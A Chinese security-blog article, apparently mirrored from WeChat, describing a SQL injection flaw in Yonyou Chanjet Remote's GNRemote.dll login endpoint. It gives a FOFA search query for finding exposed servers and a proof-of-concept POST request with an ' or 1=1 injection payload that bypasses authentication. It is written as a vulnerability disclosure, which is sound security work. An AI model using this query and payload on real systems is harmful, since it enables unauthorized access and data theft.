Skip to content

Latest commit

 

History

History
116 lines (54 loc) · 3.48 KB

[安全攻防渗透]-2023-7-14-知识分享7:用友 畅捷通远程通 GNRemote.dll SQL注入漏洞.md

File metadata and controls

116 lines (54 loc) · 3.48 KB

知识分享7:用友 畅捷通远程通 GNRemote.dll SQL注入漏洞

安全攻防渗透

安全攻防渗透

微信号 co01fire

功能介绍 信息安全领域原创公号,专注信安领域人才培养和知识分享,致力于帮助叁年以下信安从业者的学习和成长。


__发表于

收录于合集

#用友 17 个

#网络安全 41 个

#漏洞分析 23 个

点击上方“安全攻防渗透”关注我~

Tips :用友Web应用漏洞_4 **- 漏洞描述 -**用友 畅捷通远程通 GNRemote.dll SQL注入漏洞,攻击者通过SQL注入从而获取服务器上的敏感信息,甚至可以通过注入恶意代码来控制设备。

- 影响范围 -

用友 畅捷通远程通

** - FOFA -**

body="远程通CHANJET_Remote" - 漏洞复现 -

POC


 POST /GNRemote.dll?GNFunction=LoginServer&decorator=text_wrap&frombrowser=esl  
username=%22'%20or%201%3d1%3b%22&password=%018d8cbc8bfc24f018&ClientStatus=1

**抓包请求
**

****end
这就是【知识分享】 文章系列 第【7】篇:《用友 畅捷通远程通 GNRemote.dll SQL注入漏洞》,如果你觉得本篇写得不错,或者这个系列值得关注,可以表达你的意见!

** -延伸阅读** ** -**

知识分享:(Hvv行动专题)安全漏洞PoC专题预告

知识分享1:[CVE-2018-18778]ACME Mini_httpd 任意文件读取漏洞(Web服务器漏洞)

知识分享2:攻击姿势大全

** ** ** -聆听你的声音** ** -******

** ** 如果你有独到的想法和建议,欢迎私信与我一同分享!****


预览时标签不可点

微信扫一扫
关注该公众号

知道了

微信扫一扫
使用小程序


取消 允许


取消 允许

: , 。 视频 小程序 赞 ,轻点两下取消赞 在看 ,轻点两下取消在看